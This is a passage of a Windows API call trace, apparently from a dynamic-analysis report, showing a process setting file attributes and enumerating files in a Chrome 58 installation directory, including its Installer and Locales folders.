lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0114.240] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.VisualElementsManifest.xml", dwFileAttributes=0x80) returned 1 [0114.242] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0114.242] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0114.242] CoTaskMemFree (pv=0x508980) [0114.242] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0114.244] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0114.246] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\58.0.3029.110.manifest", dwFileAttributes=0x80) returned 1 [0114.249] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0114.249] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0114.249] CoTaskMemFree (pv=0x508980) [0114.249] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0114.253] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0114.253] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0114.253] CoTaskMemFree (pv=0x508980) [0114.253] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0114.254] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0114.254] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0114.254] CoTaskMemFree (pv=0x508980) [0114.254] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0114.277] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z", nBufferLength=0x105, lpBuffer=0x2aec74, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z", lpFilePart=0x0) returned 0x52 [0114.277] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7ded59e0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7ded59e0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x7ded59e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0114.277] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7ded59e0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7ded59e0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x7aa51480, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x1a3f58, dwReserved0=0x0, dwReserved1=0x0, cFileName="chrmstp.exe", cAlternateFileName="")) returned 1 [0114.278] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7c8388e0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7c8388e0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x81d5b9a8, ftLastWriteTime.dwHighDateTime=0x1d2c8a4, nFileSizeHigh=0x0, nFileSizeLow=0xad7d02b, dwReserved0=0x0, dwReserved1=0x0, cFileName="chrome.7z", cAlternateFileName="")) returned 1 [0114.278] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7ded59e0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7ded59e0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x7aa51480, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x1a3f58, dwReserved0=0x0, dwReserved1=0x0, cFileName="setup.exe", cAlternateFileName="")) returned 1 [0114.278] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7ded59e0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7ded59e0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x7aa51480, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x1a3f58, dwReserved0=0x0, dwReserved1=0x0, cFileName="setup.exe", cAlternateFileName="")) returned 0 [0114.278] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0114.278] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af11c) returned 1 [0114.278] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af128) returned 1 [0114.278] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\.", nBufferLength=0x105, lpBuffer=0x2aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales", lpFilePart=0x0) returned 0x46 [0114.278] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0114.278] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0114.278] CoTaskMemFree (pv=0x508980) [0114.278] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0114.279] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales", nBufferLength=0x105, lpBuffer=0x2aec94, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales", lpFilePart=0x0) returned 0x46 [0114.279] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af15c) returned 1 [0114.279] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales", nBufferLength=0x105, lpBuffer=0x2aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales", lpFilePart=0x0) returned 0x46 [0114.279] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\", nBufferLength=0x105, lpBuffer=0x2aec38, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\", lpFilePart=0x0) returned 0x47 [0114.281] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d78b680, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7d86fec0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x7d86fec0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0114.281] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d7fdaa0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7d7fdaa0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xfeae1a98, ftLastWriteTime.dwHighDateTime=0x1d2c8a2, nFileSizeHigh=0x0, nFileSizeLow=0x6f4e0, dwReserved0=0x0, dwReserved1=0x0, cFileName="am.pak", cAlternateFileName="")) returned 1 [0114.282] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d7fdaa0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7d7fdaa0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xfeb0b2b9, ftLastWriteTime.dwHighDateTime=0x1d2c8a2, nFileSizeHigh=0x0, nFileSizeLow=0x6df65, dwReserved0=0x0, dwReserved1=0x0, cFileName="ar.pak", cAlternateFileName="")) returned 1 [0114.282] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d7fdaa0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7d7fdaa0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xfeb34ada, ftLastWriteTime.dwHighDateTime=0x1d2c8a2, nFileSizeHigh=0x0, nFileSizeLow=0x84ca7, dwReserved0=0x0, dwReserved1=0x0, cFileName="bg.pak", cAlternateFileName="")) returned 1 [0114.282] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d7fdaa0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7d7fdaa0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xfeb6582e, ftLastWriteTime.dwHighDateTime=0x1d2c8a2, nFileSizeHigh=0x0, nFileSizeLow=0xa9727, dwReserved0=0x0, dwReserved1=0x0, cFileName="bn.pak", cAlternateFileName="")) returned 1 [0114.282] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d7fdaa0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7d7fdaa0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xfeb91760, ftLastWriteTime.dwHighDateTime=0x1d2c8a2, nFileSizeHigh=0x0, nFileSizeLow=0x5082b, dwReserved0=0x0, dwReserved1=0x0, cFileName="ca.pak", cAlternateFileName="")) returned 1 [0114.282] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d7fdaa0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7d7fdaa0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xfebbaf81, ftLastWriteTime.dwHighDateTime=0x1d2c8a2, nFileSizeHigh=0x0, nFileSizeLow=0x51809, dwReserved0=0x0, dwReserved1=0x0, cFileName="cs.pak", cAlternateFileName="")) returned 1 [0114.282] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d7fdaa0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7d7fdaa0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xfebdf980, ftLastWriteTime.dwHighDateTime=0x1d2c8a2, nFileSizeHigh=0x0, nFileSizeLow=0x494f8, dwReserved0=0x0, dwReserved1=0x0, cFileName="da.pak", cAlternateFileName="")) returned 1 [0114.282] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d7fdaa0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7d7fdaa0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xfec06a90, ftLastWriteTime.dwHighDateTime=0x1d2c8a2, nFileSizeHigh=0x0, nFileSizeLow=0x463fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="de.pak", cAlternateFileName="")) returned 1 [0114.283] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d7fdaa0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7d7fdaa0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xfec329c2, ftLastWriteTime.dwHighDateTime=0x1d2c8a2, nFileSizeHigh=0x0, nFileSizeLow=0x8f814, dwReserved0=0x0, dwReserved1=0x0, cFileName="el.pak", cAlternateFileName="")) returned 1 [0114.283] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d7fdaa0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7d7fdaa0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xfec63716, ftLastWriteTime.dwHighDateTime=0x1d2c8a2, nFileSizeHigh=0x0, nFileSizeLow=0x4244f, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-GB.pak", cAlternateFileName="")) returned 1 [0114.283] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d7fdaa0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7d7fdaa0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xfec796af, ftLastWriteTime.dwHighDateTime=0x1d2c8a2, nFileSizeHigh=0x0, nFileSizeLow=0x42442, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US.pak", cAlternateFileName="")) returned 1 [0114.283] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d7fdaa0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7d7fdaa0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xfec9928c, ftLastWriteTime.dwHighDateTime=0x1d2c8a2, nFileSizeHigh=0x0, nFileSizeLow=0x4fca5, dwReserved0=0x0, dwReserved1=0x0, cFileName="es-419.pak", cAlternateFileName="")) returned 1 [0114.283] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d823c00, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7d823c00, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xfecc51be, ftLastWriteTime.dwHighDateTime=0x1d2c8a2, nFileSizeHigh=0x0, nFileSizeLow=0x512b8, dwReserved0=0x0, dwReserved1=0x0, cFileName="es.pak", cAlternateFileName="")) returned 1 [0114.283] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d823c00, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7d823c00, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xfecf10f0, ftLastWriteTime.dwHighDateTime=0x1d2c8a2, nFileSizeHigh=0x0, nFileSizeLow=0x469ee, dwReserved0=0x0, dwReserved1=0x0, cFileName="et.pak", cAlternateFileName="")) returned 1 [0114.283] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d823c00, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7d823c00, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xfed1f733, ftLastWriteTime.dwHighDateTime=0x1d2c8a2, nFileSizeHigh=0x0, nFileSizeLow=0x72286, dwReserved0=0x0, dwReserved1=0x0, cFileName="fa.pak", cAlternateFileName="")) returned 1 [0114.284] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d823c00, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7d823c00, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xfed44132, ftLastWriteTime.dwHighDateTime=0x1d2c8a2, nFileSizeHigh=0x0, nFileSizeLow=0x4b6ae, dwReserved0=0x0, dwReserved1=0x0, cFileName="fi.pak", cAlternateFileName="")) returned 1 [0114.284] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d823c00, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7d823c00, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xfed72775, ftLastWriteTime.dwHighDateTime=0x1d2c8a2, nFileSizeHigh=0x0, nFileSizeLow=0x51c09, dwReserved0=0x0, dwReserved1=0x0, cFileName="fil.pak", cAlternateFileName="")) returned 1 [0114.284] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d823c00, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7d823c00, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xfed97174, ftLastWriteTime.dwHighDateTime=0x1d2c8a2, nFileSizeHigh=0x0, nFileSizeLow=0x55a6c, dwReserved0=0x0, dwReserved1=0x0, cFileName="fr.pak", cAlternateFileName="")) returned 1 [0114.284] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d823c00, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7d823c00, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xfedd1b0c, ftLastWriteTime.dwHighDateTime=0x1d2c8a2, nFileSizeHigh=0x0, nFileSizeLow=0x9f1a1, dwReserved0=0x0, dwReserved1=0x0, cFileName="gu.pak", cAlternateFileName="")) returned 1 [0114.284] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d823c00, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7d823c00, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xfee07682, ftLastWriteTime.dwHighDateTime=0x1d2c8a2, nFileSizeHigh=0x0, nFileSizeLow=0x5df23, dwReserved0=0x0, dwReserved1=0x0, cFileName="he.pak", cAlternateFileName="")) returned 1 [0114.284] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d823c00, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7d823c00, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xfee383d6, ftLastWriteTime.dwHighDateTime=0x1d2c8a2, nFileSizeHigh=0x0, nFileSizeLow=0xa3281, dwReserved0=0x0, dwReserved1=0x0, cFileName="hi.pak", cAlternateFileName="")) returned 1 [0114.284] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d823c00, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7d823c00, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xfee6df4c, ftLastWriteTime.dwHighDateTime=0x1d2c8a2, nFileSizeHigh=0x0, nFileSizeLow=0x4bc57, dwReserved0=0x0, dwReserved1=0x0, cFileName="hr.pak", cAlternateFileName="")) returned 1 [0114.285] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d823c00, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7d823c00, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xfee9505c, ftLastWriteTime.dwHighDateTime=0x1d2c8a2, nFileSizeHigh=0x0, nFileSizeLow=0x54a87, dwReserved0=0x0, dwReserved1=0x0, cFileName="hu.pak", cAlternateFileName="")) returned 1 [0114.285] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d823c00, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7d823c00, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xfeebe87d, ftLastWriteTime.dwHighDateTime=0x1d2c8a2, nFileSizeHigh=0x0, nFileSizeLow=0x47e7d, dwReserved0=0x0, dwReserved1=0x0, cFileName="id.pak", cAlternateFileName="")) returned 1 [0114.285] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d823c00, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7d823c00, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xfeee598d, ftLastWriteTime.dwHighDateTime=0x1d2c8a2, nFileSizeHigh=0x0, nFileSizeLow=0x4e532, dwReserved0=0x0, dwReserved1=0x0, cFileName="it.pak", cAlternateFileName="")) returned 1 [0114.285] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d823c00, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7d823c00, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xfef118bf, ftLastWriteTime.dwHighDateTime=0x1d2c8a2, nFileSizeHigh=0x0, nFileSizeLow=0x5f8fa, dwReserved0=0x0, dwReserved1=0x0, cFileName="ja.pak", cAlternateFileName="")) returned 1 [0114.285] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d823c00, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7d823c00, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xfef3ff02, ftLastWriteTime.dwHighDateTime=0x1d2c8a2, nFileSizeHigh=0x0, nFileSizeLow=0xb6beb, dwReserved0=0x0, dwReserved1=0x0, cFileName="kn.pak", cAlternateFileName="")) returned 1 [0114.285] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d823c00, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7d823c00, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xfef67012, ftLastWriteTime.dwHighDateTime=0x1d2c8a2, nFileSizeHigh=0x0, nFileSizeLow=0x50b94, dwReserved0=0x0, dwReserved1=0x0, cFileName="ko.pak", cAlternateFileName="")) returned 1 [0114.285] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d849d60, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7d849d60, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xfef95655, ftLastWriteTime.dwHighDateTime=0x1d2c8a2, nFileSizeHigh=0x0, nFileSizeLow=0x51c11, dwReserved0=0x0, dwReserved1=0x0, cFileName="lt.pak", cAlternateFileName="")) returned 1 [0114.286] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d849d60, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7d849d60, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xfefd4e0f, ftLastWriteTime.dwHighDateTime=0x1d2c8a2, nFileSizeHigh=0x0, nFileSizeLow=0x51fd0, dwReserved0=0x0, dwReserved1=0x0, cFileName="lv.pak", cAlternateFileName="")) returned 1 [0114.286] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d849d60, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7d849d60, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xfeffe630, ftLastWriteTime.dwHighDateTime=0x1d2c8a2, nFileSizeHigh=0x0, nFileSizeLow=0xccccc, dwReserved0=0x0, dwReserved1=0x0, cFileName="ml.pak", cAlternateFileName="")) returned 1 [0114.286] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d849d60, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7d849d60, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xff0341a6, ftLastWriteTime.dwHighDateTime=0x1d2c8a2, nFileSizeHigh=0x0, nFileSizeLow=0xa1beb, dwReserved0=0x0, dwReserved1=0x0, cFileName="mr.pak", cAlternateFileName="")) returned 1 [0114.286] FindNextFileW (in: hFindFile=0x4d1060, 